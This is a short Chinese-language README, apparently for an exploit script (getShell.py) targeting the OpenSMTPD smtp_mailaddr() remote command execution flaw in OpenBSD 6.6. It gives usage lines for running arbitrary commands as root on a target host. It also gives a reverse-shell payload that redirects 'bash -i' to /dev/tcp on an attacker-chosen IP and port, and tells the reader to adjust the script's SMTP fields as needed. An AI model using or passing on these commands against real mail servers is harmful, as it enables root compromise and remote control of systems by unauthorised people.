该漏洞存在于OpenBSD的邮件服务器OpenSMTPD的“smtp_mailaddr()”函数中,影响OpenBSD 6.6版本。攻击者可利用该漏洞以root用户身份执行任意shell命令,例如“sleep 66”。
python3 getShell.py <目标IP> <目标端口> <命令>
如果需要反弹shell,可以这样运行:
python3 getShell.py <目标IP> <目标端口> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
根据实际情况修改此利用脚本中的某些内容,如RCPT to等(如有需要)。
更多详细解释请参阅这篇文章:
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/